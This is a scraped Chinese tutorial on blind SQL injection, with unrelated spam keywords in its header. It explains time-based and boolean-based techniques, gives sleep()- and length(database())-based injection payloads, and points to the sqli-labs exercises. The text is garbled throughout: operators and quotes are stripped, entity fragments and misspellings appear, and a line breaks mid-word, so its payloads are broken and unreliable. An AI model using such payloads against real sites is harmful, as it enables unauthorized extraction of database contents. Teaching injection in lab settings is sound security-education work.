.net做网站开发吗,google如何提交网站,巨量关键词搜索查询,建设局的全称盲注#xff1a;
1、当攻击者利用SQL注入漏洞进行攻击时#xff0c;有时候web应用程序会显示#xff0c;后端数据库执行SQL查询返回的错误信息#xff0c;这些信息能帮助进行SQL注入#xff0c;但更多时候#xff0c;数据库没有输出数据web页面#xff0c;这是攻击者会…盲注
1、当攻击者利用SQL注入漏洞进行攻击时有时候web应用程序会显示后端数据库执行SQL查询返回的错误信息这些信息能帮助进行SQL注入但更多时候数据库没有输出数据web页面这是攻击者会查询一系列的true或false问题或者基于时间判断的问题强制从数据库获取数据。
2、Blind SQL盲注是注入攻击的其中一种向数据库发送true或false这样的问题并根据应用程序返回的信息判断结果这种攻击的出现是因为应用程序配置为只显示常规错误并不显示sql语句的错误这种情况并没有解决SQL注入存在的代码问题。
3、盲注可以分为基于不二的盲注和基于事件的盲注
一基于时间的盲注
1、延时注入用的最多的注入
2、常用的判断语句 and if(10,1,sleep(10)) -- and if(10,1,sleep(10)) --
) and if(10,1,sleep(10)) --
) and if(10,1,sleep(10)) --
) and if(10,1,sleep(10)) --
利用if条件01函数当条件为真返回0假则返回1
sqli-lab 9-10实验就是基于时间的盲注
?id1 and if(ascli(substr(database(),1.1))115,sleep(5),1)--
二基于布尔的盲注
基于布尔型的盲注我们通常采用下面的方法猜解字符串
select length(database());
select substr(database(),1,1);
select length ascii(substr(database(),1,1);
select length ascii(substr(database(),1,1)N;
select length ascii(substr(database(),1,1)N;
select length ascii(substr(databa
se(),1,1)N;
输入:?id1 输入?id1 输入?id1 and length(database())8 -- (查看数据库的长度) 把8改成9会发现没有了 说明数据库长度为8